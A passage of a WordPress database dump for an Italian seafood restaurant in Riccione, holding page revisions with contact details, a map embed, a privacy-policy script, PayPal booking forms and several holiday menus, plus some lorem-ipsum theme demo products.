2016','','inherit','closed','closed','','158-revision-v1','','','2015-11-29 09:42:52','2015-11-29 08:42:52','',158,'http://www.ristorantesolymar.it/2015/11/29/158-revision-v1/',0,'revision','',0),(167,1,'2015-11-29 10:23:02','2015-11-29 09:23:02','Indirizzo: Viale D\'Annunzio, 190, 47838 Riccione RN\nTelefono: 0541 648528\nOrari: 12:30–14:00, 19:30–22:00\nEmail: info \n\n<iframe width=\"100%\" height=\"400\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.it/maps?f=q&amp;source=s_q&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.it/maps?f=q&amp;source=embed&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A\" style=\"color:#0000FF;text-align:left\">Visualizzazione ingrandita della mappa</a></small>\n\nSiamo recensiti positivamente su TripAdvisor, Google+, <a href=\"http://www.baltazar.it/locali/italia/emilia-romagna/riccione/sol-y-mar-riccione/\" target=\"_blank\">Baltazar</a> e tante altre guide online.','Contatti','','inherit','closed','closed','','28-autosave-v1','','','2015-11-29 10:23:02','2015-11-29 09:23:02','',28,'http://www.ristorantesolymar.it/2015/11/29/28-autosave-v1/',0,'revision','',0),(168,1,'2015-11-29 09:51:23','2015-11-29 08:51:23','Indirizzo: Viale D\'Annunzio, 190, 47838 Riccione RN\r\nTelefono: 0541 648528\r\nOrari: 12:30–14:00, 19:30–22:00\r\n\r\n<iframe width=\"100%\" height=\"400\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.it/maps?f=q&amp;source=s_q&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.it/maps?f=q&amp;source=embed&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A\" style=\"color:#0000FF;text-align:left\">Visualizzazione ingrandita della mappa</a></small>\r\n\r\nSiamo recensiti positivamente su TripAdvisor, Google+, <a href=\"http://www.baltazar.it/locali/italia/emilia-romagna/riccione/sol-y-mar-riccione/\" target=\"_blank\">Baltazar</a> e tante altre guide online.','Contatti','','inherit','closed','closed','','28-revision-v1','','','2015-11-29 09:51:23','2015-11-29 08:51:23','',28,'http://www.ristorantesolymar.it/2015/11/29/28-revision-v1/',0,'revision','',0),(169,1,'2015-11-29 10:23:13','2015-11-29 09:23:13','Indirizzo: Viale D\'Annunzio, 190, 47838 Riccione RN\r\nTelefono: 0541 648528\r\nOrari: 12:30–14:00, 19:30–22:00\r\nEmail: info @ ristorantesolymar . it\r\n\r\n<iframe width=\"100%\" height=\"400\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.it/maps?f=q&amp;source=s_q&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.it/maps?f=q&amp;source=embed&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A\" style=\"color:#0000FF;text-align:left\">Visualizzazione ingrandita della mappa</a></small>\r\n\r\nSiamo recensiti positivamente su TripAdvisor, Google+, <a href=\"http://www.baltazar.it/locali/italia/emilia-romagna/riccione/sol-y-mar-riccione/\" target=\"_blank\">Baltazar</a> e tante altre guide online.','Contatti','','inherit','closed','closed','','28-revision-v1','','','2015-11-29 10:23:13','2015-11-29 09:23:13','',28,'http://www.ristorantesolymar.it/2015/11/29/28-revision-v1/',0,'revision','',0),(170,1,'2015-12-04 15:52:55','2015-12-04 14:52:55','Indirizzo: Viale D\'Annunzio, 190, 47838 Riccione RN\r\nTelefono: 0541 648528 (oppure 3206962059 in caso di malfuzionamento linea)\r\nOrari: 12:30–14:00, 19:30–22:00\r\nEmail: info @ ristorantesolymar . it\r\n\r\n<iframe width=\"100%\" height=\"400\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.it/maps?f=q&amp;source=s_q&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.it/maps?f=q&amp;source=embed&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A\" style=\"color:#0000FF;text-align:left\">Visualizzazione ingrandita della mappa</a></small>\r\n\r\nSiamo recensiti positivamente su TripAdvisor, Google+, <a href=\"http://www.baltazar.it/locali/italia/emilia-romagna/riccione/sol-y-mar-riccione/\" target=\"_blank\">Baltazar</a> e tante altre guide online.','Contatti','','inherit','closed','closed','','28-revision-v1','','','2015-12-04 15:52:55','2015-12-04 14:52:55','',28,'http://www.ristorantesolymar.it/2015/12/04/28-revision-v1/',0,'revision','',0),(4301,1,'2018-08-07 14:03:10','2018-08-07 14:03:10','','logo','','inherit','open','closed','','logo','','','2018-08-07 14:03:10','2018-08-07 14:03:10','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo.png',0,'attachment','image/png',0),(172,1,'2015-12-13 12:34:06','2015-12-13 11:34:06','Info Privacy e Trattamento dei dati\r\n<a href=\"//www.iubenda.com/privacy-policy/7761758\" class=\"iubenda-white no-brand iub-body-embed iubenda-embed\" title=\"Privacy Policy\">Privacy Policy</a><script type=\"text/javascript\">(function (w,d) {var loader = function () {var s = d.createElement(\"script\"), tag = d.getElementsByTagName(\"script\")[0]; s.src = \"//cdn.iubenda.com/iubenda.js\"; tag.parentNode.insertBefore(s,tag);}; if(w.addEventListener){w.addEventListener(\"load\", loader, false);}else if(w.attachEvent){w.attachEvent(\"onload\", loader);}else{w.onload = loader;}})(window, document);</script>','Privacy','','publish','closed','closed','','info-privacy','','','2016-04-20 15:54:46','2016-04-20 13:54:46','',0,'http://www.ristorantesolymar.it/?page_id=172',0,'page','',0),(173,1,'2015-12-13 12:34:06','2015-12-13 11:34:06','<a href=\"//www.iubenda.com/privacy-policy/7761758\" class=\"iubenda-white no-brand iub-body-embed iubenda-embed\" title=\"Privacy Policy\">Privacy Policy</a><script type=\"text/javascript\">(function (w,d) {var loader = function () {var s = d.createElement(\"script\"), tag = d.getElementsByTagName(\"script\")[0]; s.src = \"//cdn.iubenda.com/iubenda.js\"; tag.parentNode.insertBefore(s,tag);}; if(w.addEventListener){w.addEventListener(\"load\", loader, false);}else if(w.attachEvent){w.attachEvent(\"onload\", loader);}else{w.onload = loader;}})(window, document);</script>','Privacy','','inherit','closed','closed','','172-revision-v1','','','2015-12-13 12:34:06','2015-12-13 11:34:06','',172,'http://www.ristorantesolymar.it/2015/12/13/172-revision-v1/',0,'revision','',0),(174,1,'2015-12-13 12:35:38','2015-12-13 11:35:38','[one_fourth]<h2>Menu\' Creativo per 2 persone</h2>\r\nBenvenuto della cucina\r\nDegustazione di antipasti\r\nUn crudo e due cotti\r\nLa pasta\r\nIl pesce\r\nDessert\r\nEuro 98,00 (Escluso Bavande)[/one_fourth][one_fourth]<h2>Menu\' creativo per 2 persone + bere</h2>\r\nMenu\' creativo + 1 bottiglia di vino + 2 caffe\' + 1 bottiglia d\'acqua\r\nEuro 120[/one_fourth][one_fourth]<h2>Menu\' Storico per 2 persone</h2>\r\nCalamari saltati con patate e bacon\r\nGamberi alla greca\r\nSpaghetto alle vongole\r\nFrittura mista e lo spiedone grigliato\r\nSorbetto\r\nEuro 90,00 (Escluso Bavande)[/one_fourth][one_fourth]<h2>Menu\' storico per 2 persone + bere</h2>\r\nMenu\' storico per due persone con 1 bottiglia di vino 2 caffè e una bottiglia d\'acqua\r\nEuro 115[/one_fourth]\r\n\r\n<form action=\"https://www.paypal.com/cgi-bin/webscr\" method=\"post\" target=\"paypal\"><input name=\"cmd\" type=\"hidden\" value=\"_s-xclick\" />\r\n<input name=\"hosted_button_id\" type=\"hidden\" value=\"YDDAGXBWAKA8U\" />\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><input name=\"on0\" type=\"hidden\" value=\"Scegli Menù\" />Scegli Menù</td>\r\n</tr>\r\n<tr>\r\n<td><select name=\"os0\">\r\n<option value=\"Creativo x 2 persone\">Creativo x 2 persone €98,00 EUR</option>\r\n<option value=\"Creativo x 2 persone + bere\">Creativo x 2 persone + bere €120,00 EUR</option>\r\n<option value=\"Storico x 2 persone\">Storico x 2 persone €90,00 EUR</option>\r\n<option value=\"Storico x 2 persone + bere\">Storico x 2 persone + bere €115,00 EUR</option>\r\n</select></td>\r\n</tr>\r\n<tr>\r\n<td><input name=\"on1\" type=\"hidden\" value=\"Nominativi\" />Nominativi</td>\r\n</tr>\r\n<tr>\r\n<td><input maxlength=\"200\" name=\"os1\" type=\"text\" /></td>\r\n</tr>\r\n<tr>\r\n<td><input name=\"on2\" type=\"hidden\" value=\"Telefono\" />Telefono</td>\r\n</tr>\r\n<tr>\r\n<td><input maxlength=\"200\" name=\"os2\" type=\"text\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<input name=\"currency_code\" type=\"hidden\" value=\"EUR\" />\r\n<input alt=\"PayPal è il metodo rapido e sicuro per pagare e farsi pagare online.\" name=\"submit\" src=\"https://www.paypalobjects.com/it_IT/IT/i/btn/btn_cart_LG.gif\" type=\"image\" />\r\n<img src=\"https://www.paypalobjects.com/it_IT/i/scr/pixel.gif\" alt=\"\" width=\"1\" height=\"1\" border=\"0\" />\r\n\r\n</form>\r\n\r\nMaggiori dettagli sul trattamento dei dati li potete trovare alla pagina sulla <a href=\"http://www.ristorantesolymar.it/info-privacy/\">privacy</a>','Acquista Cena','','inherit','closed','closed','','36-revision-v1','','','2015-12-13 12:35:38','2015-12-13 11:35:38','',36,'http://www.ristorantesolymar.it/2015/12/13/36-revision-v1/',0,'revision','',0),(175,1,'2015-12-13 12:35:51','2015-12-13 11:35:51','Info Privacy e Trattamento dei dati\r\n<a href=\"//www.iubenda.com/privacy-policy/7761758\" class=\"iubenda-white no-brand iub-body-embed iubenda-embed\" title=\"Privacy Policy\">Privacy Policy</a><script type=\"text/javascript\">(function (w,d) {var loader = function () {var s = d.createElement(\"script\"), tag = d.getElementsByTagName(\"script\")[0]; s.src = \"//cdn.iubenda.com/iubenda.js\"; tag.parentNode.insertBefore(s,tag);}; if(w.addEventListener){w.addEventListener(\"load\", loader, false);}else if(w.attachEvent){w.attachEvent(\"onload\", loader);}else{w.onload = loader;}})(window, document);</script>','Privacy','','inherit','closed','closed','','172-revision-v1','','','2015-12-13 12:35:51','2015-12-13 11:35:51','',172,'http://www.ristorantesolymar.it/2015/12/13/172-revision-v1/',0,'revision','',0),(176,1,'2015-12-13 12:42:25','2015-12-13 11:42:25',' ','','','publish','closed','closed','','176','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',0,'http://www.ristorantesolymar.it/?p=176',32,'nav_menu_item','',0),(177,1,'2018-07-31 09:02:51','2018-07-31 09:02:51','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Caviar Pancakes','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','caviar-pancakes','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=177',8,'product','',1),(178,1,'2015-12-30 13:12:46','2015-12-30 12:12:46','<em>Dobbiamo diventare il cambiamento che vogliamo vedere.</em>\n<em> (Mahatma Gandhi)</em>\n<h1>San Silvestro 2015</h1>\n<em>Entrée di Benvenuto</em>\n<em> .Crudo di scampo alla pizzaiola e burrata</em>\n<em> .Rollé di Gallinella al sesamo su crema di porri e lemongrass</em>\n<em> .Alici dorate su insalatina di indivia ,arancio e avocado</em>\n<em> -Gnocchetti di patate alla carbonara di Triglie affumicate e tartufo</em>\n<em> .Tataki di Ricciola ,burro e salvia con scalogno al vino rosso</em>\n<em> .Granita allo Spumante (pre dessert)</em>\n<em> .I Tre Cioccolati</em>\n<em> .Caffè e piccola mousse al panettone</em>\n\n60 € escluso bevande\nBambini 7/13 anni menù 30 €\n1 /6 Coperto San Silvestro 10 € ordinazione libera\n\nPer prenotazioni telefonare allo 0541 648528 è richiesta la caparra pari alla metà dell\'importo. La prenotazione si ritiene confermata solo dopo il pagamento della caparra, vista la complessità di alcuni piatti, eventuali allergie e intolleranze andranno segnalate preventivamente\n\n<strong>Invia Caparra</strong>\n<em>NOTA IMPORTANTE: informars\n<form action=\"https://www.paypal.com/cgi-bin/webscr\" method=\"post\" target=\"_top\">\n<input type=\"hidden\" name=\"cmd\" value=\"_s-xclick\">\n<input type=\"hidden\" name=\"hosted_button_id\" value=\"6ZSKW4YEVLBPQ\">\n<table>\n<tr><td><input type=\"hidden\" name=\"on0\" value=\"Adulti\">Adulti</td></tr><tr><td><select name=\"os0\">\n	<option value=\"1 adulto\">1 adulto €30,00 EUR</option>\n	<option value=\"2 adulti\">2 adulti €60,00 EUR</option>\n	<option value=\"3 adulti\">3 adulti €90,00 EUR</option>\n	<option value=\"4 adulti\">4 adulti €120,00 EUR</option>\n	<option value=\"5 adulti\">5 adulti €150,00 EUR</option>\n	<option value=\"6 adulti\">6 adulti €180,00 EUR</option>\n</select> </td></tr>\n<tr><td><input type=\"hidden\" name=\"on1\" value=\"Bambini\">Bambini</td></tr><tr><td><select name=\"os1\">\n	<option value=\"0\">0 </option>\n	<option value=\"1\">1 </option>\n	<option value=\"2\">2 </option>\n	<option value=\"3\">3 </option>\n	<option value=\"4\">4 </option>\n</select> </td></tr>\n<tr><td><input type=\"hidden\" name=\"on2\" value=\"Nome e telefono di chi prenota\">Nome e telefono di chi prenota</td></tr><tr><td><input type=\"text\" name=\"os2\" maxlength=\"200\"></td></tr>\n</table>\n<input type=\"hidden\" name=\"currency_code\" value=\"EUR\">\n<input type=\"image\" src=\"https://www.paypalobjects.com/it_IT/IT/i/btn/btn_buynowCC_LG.gif\" border=\"0\" name=\"submit\" alt=\"PayPal è il metodo rapido e sicuro per pagare e farsi pagare online.\">\n<img alt=\"\" border=\"0\" src=\"https://www.paypalobjects.com/it_IT/i/scr/pixel.gif\" width=\"1\" height=\"1\">\n</form>\n','Menù di Capodanno 2016','','inherit','closed','closed','','158-autosave-v1','','','2015-12-30 13:12:46','2015-12-30 12:12:46','',158,'http://www.ristorantesolymar.it/2015/12/30/158-autosave-v1/',0,'revision','',0),(179,1,'2015-12-30 13:13:08','2015-12-30 12:13:08','<em>Dobbiamo diventare il cambiamento che vogliamo vedere.</em>\r\n<em> (Mahatma Gandhi)</em>\r\n<h1>San Silvestro 2015</h1>\r\n<em>Entrée di Benvenuto</em>\r\n<em> .Crudo di scampo alla pizzaiola e burrata</em>\r\n<em> .Rollé di Gallinella al sesamo su crema di porri e lemongrass</em>\r\n<em> .Alici dorate su insalatina di indivia ,arancio e avocado</em>\r\n<em> -Gnocchetti di patate alla carbonara di Triglie affumicate e tartufo</em>\r\n<em> .Tataki di Ricciola ,burro e salvia con scalogno al vino rosso</em>\r\n<em> .Granita allo Spumante (pre dessert)</em>\r\n<em> .I Tre Cioccolati</em>\r\n<em> .Caffè e piccola mousse al panettone</em>\r\n\r\n60 € escluso bevande\r\nBambini 7/13 anni menù 30 €\r\n1 /6 Coperto San Silvestro 10 € ordinazione libera\r\n\r\nPer prenotazioni telefonare allo 0541 648528 è richiesta la caparra pari alla metà dell\'importo. La prenotazione si ritiene confermata solo dopo il pagamento della caparra, vista la complessità di alcuni piatti, eventuali allergie e intolleranze andranno segnalate preventivamente\r\n\r\n<strong>Invia Caparra</strong>\r\n<em>NOTA IMPORTANTE: prima informarsi della disponibilità!!</em>\r\n<form action=\"https://www.paypal.com/cgi-bin/webscr\" method=\"post\" target=\"_top\">\r\n<input type=\"hidden\" name=\"cmd\" value=\"_s-xclick\">\r\n<input type=\"hidden\" name=\"hosted_button_id\" value=\"6ZSKW4YEVLBPQ\">\r\n<table>\r\n<tr><td><input type=\"hidden\" name=\"on0\" value=\"Adulti\">Adulti</td></tr><tr><td><select name=\"os0\">\r\n	<option value=\"1 adulto\">1 adulto €30,00 EUR</option>\r\n	<option value=\"2 adulti\">2 adulti €60,00 EUR</option>\r\n	<option value=\"3 adulti\">3 adulti €90,00 EUR</option>\r\n	<option value=\"4 adulti\">4 adulti €120,00 EUR</option>\r\n	<option value=\"5 adulti\">5 adulti €150,00 EUR</option>\r\n	<option value=\"6 adulti\">6 adulti €180,00 EUR</option>\r\n</select> </td></tr>\r\n<tr><td><input type=\"hidden\" name=\"on1\" value=\"Bambini\">Bambini</td></tr><tr><td><select name=\"os1\">\r\n	<option value=\"0\">0 </option>\r\n	<option value=\"1\">1 </option>\r\n	<option value=\"2\">2 </option>\r\n	<option value=\"3\">3 </option>\r\n	<option value=\"4\">4 </option>\r\n</select> </td></tr>\r\n<tr><td><input type=\"hidden\" name=\"on2\" value=\"Nome e telefono di chi prenota\">Nome e telefono di chi prenota</td></tr><tr><td><input type=\"text\" name=\"os2\" maxlength=\"200\"></td></tr>\r\n</table>\r\n<input type=\"hidden\" name=\"currency_code\" value=\"EUR\">\r\n<input type=\"image\" src=\"https://www.paypalobjects.com/it_IT/IT/i/btn/btn_buynowCC_LG.gif\" border=\"0\" name=\"submit\" alt=\"PayPal è il metodo rapido e sicuro per pagare e farsi pagare online.\">\r\n<img alt=\"\" border=\"0\" src=\"https://www.paypalobjects.com/it_IT/i/scr/pixel.gif\" width=\"1\" height=\"1\">\r\n</form>\r\n','Menù di Capodanno 2016','','inherit','closed','closed','','158-revision-v1','','','2015-12-30 13:13:08','2015-12-30 12:13:08','',158,'http://www.ristorantesolymar.it/2015/12/30/158-revision-v1/',0,'revision','',0),(180,1,'2018-07-31 09:07:09','2018-07-31 09:07:09','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Creamy Garlic Shrimp','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','creamy-garlic-shrimp','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=180',9,'product','',2),(181,2,'2016-02-03 11:01:17','2016-02-03 10:01:17','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2016/02/happyvalentines-300x300.jpg\" alt=\"happyvalentines\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-182\" />Si vede bene solo con gli occhi \r\nL essenziale é invisibile agli occhi \r\n(Antoine de Saint -Exupery)\r\n14 febbraio ❤❤\r\nMenu \' sia a pranzo che a cena\r\nIl nostro cannolo siciliano con crudo di mazzancolle e ricotta\r\nTagliatelle di Seppia allo scoglio\r\nMantecato di Baccalà croccante e soffice di peperone dolce\r\nCappelletti di patate e basilico in guazzetto di Astice\r\nOmbrina al pane di pomodoro su spuma di patate\r\nDessert (sorpresa)\r\n45 € cd \r\nBevande escluse\r\nL immagine è volutamente provocatoria \r\nStop alle violenze sulle Donne','Menù di San Valentino 2016','','publish','open','open','','menu-di-san-valentino-2016','','','2016-03-17 14:41:51','2016-03-17 13:41:51','',0,'http://www.ristorantesolymar.it/?p=181',0,'post','',0),(182,1,'2016-02-03 11:00:38','2016-02-03 10:00:38','','happyvalentines','','inherit','open','closed','','happyvalentines','','','2016-02-03 11:00:38','2016-02-03 10:00:38','',181,'http://www.ristorantesolymar.it/wp-content/uploads/2016/02/happyvalentines.jpg',0,'attachment','image/jpeg',0),(183,1,'2016-02-03 11:01:17','2016-02-03 10:01:17','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2016/02/happyvalentines-300x300.jpg\" alt=\"happyvalentines\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-182\" />Si vede bene solo con gli occhi \r\nL essenziale é invisibile agli occhi \r\n(Antoine de Saint -Exupery)\r\n14 febbraio ❤❤\r\nMenu \' sia a pranzo che a cena\r\nIl nostro cannolo siciliano con crudo di mazzancolle e ricotta\r\nTagliatelle di Seppia allo scoglio\r\nMantecato di Baccalà croccante e soffice di peperone dolce\r\nCappelletti di patate e basilico in guazzetto di Astice\r\nOmbrina al pane di pomodoro su spuma di patate\r\nDessert (sorpresa)\r\n45 € cd \r\nBevande escluse\r\nL immagine è volutamente provocatoria \r\nStop alle violenze sulle Donne','Menù di San Valentino 2016','','inherit','closed','closed','','181-revision-v1','','','2016-02-03 11:01:17','2016-02-03 10:01:17','',181,'http://www.ristorantesolymar.it/2016/02/03/181-revision-v1/',0,'revision','',0),(184,1,'2016-02-03 11:10:41','2016-02-03 10:10:41','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2016/02/happyvalentines-300x300.jpg\" alt=\"happyvalentines\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-182\" />Si vede bene solo con gli occhi \r\nL essenziale é invisibile agli occhi \r\n(Antoine de Saint -Exupery)\r\n14 febbraio ❤❤\r\nMenu \' sia a pranzo che a cena\r\nIl nostro cannolo siciliano con crudo di mazzancolle e ricotta\r\nTagliatelle di Seppia allo scoglio\r\nMantecato di Baccalà croccante e soffice di peperone dolce\r\nCappelletti di patate e basilico in guazzetto di Astice\r\nOmbrina al pane di pomodoro su spuma di patate\r\nDessert (sorpresa)\r\n45 € cd \r\nBevande escluse\r\nL immagine è volutamente provocatoria \r\nStop alle violenze sulle Donne\r\n\r\n\r\n<h2>Prenota Cena</h2>\r\n<em>Attenzione: verificare disponibilità posti preventivamente allo 0541-648528</em>\r\n<form action=\"https://www.paypal.com/cgi-bin/webscr\" method=\"post\" target=\"_top\">\r\n<input type=\"hidden\" name=\"cmd\" value=\"_s-xclick\">\r\n<input type=\"hidden\" name=\"hosted_button_id\" value=\"TADC7MHGH57PJ\">\r\n<table>\r\n<tr><td><input type=\"hidden\" name=\"on0\" value=\"Adulti\">Adulti</td></tr><tr><td><select name=\"os0\">\r\n	<option value=\"1 adulto\">1 adulto €25,00 EUR</option>\r\n	<option value=\"2 adulti\">2 adulti €50,00 EUR</option>\r\n</select> </td></tr>\r\n<tr><td><input type=\"hidden\" name=\"on1\" value=\"Nome e telefono di chi prenota\">Nome e telefono di chi prenota</td></tr><tr><td><input type=\"text\" name=\"os1\" maxlength=\"200\"></td></tr>\r\n</table>\r\n<input type=\"hidden\" name=\"currency_code\" value=\"EUR\">\r\n<input type=\"image\" src=\"https://www.paypalobjects.com/it_IT/IT/i/btn/btn_buynowCC_LG.gif\" border=\"0\" name=\"submit\" alt=\"PayPal è il metodo rapido e sicuro per pagare e farsi pagare online.\">\r\n<img alt=\"\" border=\"0\" src=\"https://www.paypalobjects.com/it_IT/i/scr/pixel.gif\" width=\"1\" height=\"1\">\r\n</form>\r\n','Menù di San Valentino 2016','','inherit','closed','closed','','181-revision-v1','','','2016-02-03 11:10:41','2016-02-03 10:10:41','',181,'http://www.ristorantesolymar.it/2016/02/03/181-revision-v1/',0,'revision','',0),(185,1,'2016-02-03 11:18:50','2016-02-03 10:18:50','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2016/02/happyvalentines-300x300.jpg\" alt=\"happyvalentines\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-182\" />Si vede bene solo con gli occhi \r\nL essenziale é invisibile agli occhi \r\n(Antoine de Saint -Exupery)\r\n14 febbraio ❤❤\r\nMenu \' sia a pranzo che a cena\r\nIl nostro cannolo siciliano con crudo di mazzancolle e ricotta\r\nTagliatelle di Seppia allo scoglio\r\nMantecato di Baccalà croccante e soffice di peperone dolce\r\nCappelletti di patate e basilico in guazzetto di Astice\r\nOmbrina al pane di pomodoro su spuma di patate\r\nDessert (sorpresa)\r\n45 € cd \r\nBevande escluse\r\nL immagine è volutamente provocatoria \r\nStop alle violenze sulle Donne\r\n\r\n\r\n<h2>Prenota Cena</h2>\r\n<em>Attenzione: verificare disponibilità posti preventivamente allo 0541-648528</em>\r\n<form action=\"https://www.paypal.com/cgi-bin/webscr\" method=\"post\" target=\"_top\">\r\n<input type=\"hidden\" name=\"cmd\" value=\"_s-xclick\">\r\n<input type=\"hidden\" name=\"hosted_button_id\" value=\"TADC7MHGH57PJ\">\r\n<table>\r\n<tr><td><input type=\"hidden\" name=\"on0\" value=\"Adulti\">Adulti</td></tr><tr><td><select name=\"os0\">\r\n	<option value=\"1 adulto\">1 adulto €10,00 EUR</option>\r\n	<option value=\"2 adulti\">2 adulti €20,00 EUR</option>\r\n</select> </td></tr>\r\n<tr><td><input type=\"hidden\" name=\"on1\" value=\"Nome e telefono di chi prenota\">Nome e telefono di chi prenota</td></tr><tr><td><input type=\"text\" name=\"os1\" maxlength=\"200\"></td></tr>\r\n</table>\r\n<input type=\"hidden\" name=\"currency_code\" value=\"EUR\">\r\n<input type=\"image\" src=\"https://www.paypalobjects.com/it_IT/IT/i/btn/btn_buynowCC_LG.gif\" border=\"0\" name=\"submit\" alt=\"PayPal è il metodo rapido e sicuro per pagare e farsi pagare online.\">\r\n<img alt=\"\" border=\"0\" src=\"https://www.paypalobjects.com/it_IT/i/scr/pixel.gif\" width=\"1\" height=\"1\">\r\n</form>\r\n','Menù di San Valentino 2016','','inherit','closed','closed','','181-revision-v1','','','2016-02-03 11:18:50','2016-02-03 10:18:50','',181,'http://www.ristorantesolymar.it/2016/02/03/181-revision-v1/',0,'revision','',0),(187,2,'2016-03-07 07:38:45','2016-03-07 06:38:45','Di seguito alcune informazioni riguardanti il week end di Pasqua 2016-03-16\r\nDomenica a pranzo menu fisso(vedi sotto) caparra obbligatoria\r\nDomenica  a cena e lunedì a pranzo menù alla carta , caparra obbligatoria\r\n\r\n<em>Brilla nell\' aria\r\nPrimavera d\'intorno.\r\nBrilla nell\' aria\r\ne per li campi esulta,\r\nsi\' ch\' a mirarla intenerisce il core\r\nodi greggi belar, muggire armenti\r\ne gli altri augelli contenti\r\na gara insieme,\r\nper lo libero ciel\r\nfan mille giri,\r\npur festeggiando il lor tempo migliore (G.Leopardi )\r\nDomenica 27 marzo\r\nPranzo\r\nPasqua 2016\r\nEntrée di Benvenuto\r\nBocconcino di Cernia al lime su crudo di asparagi ,zucchinee topinambur\r\nFondale Marino:variazioni sui frutti di mare\r\nCalamaretto 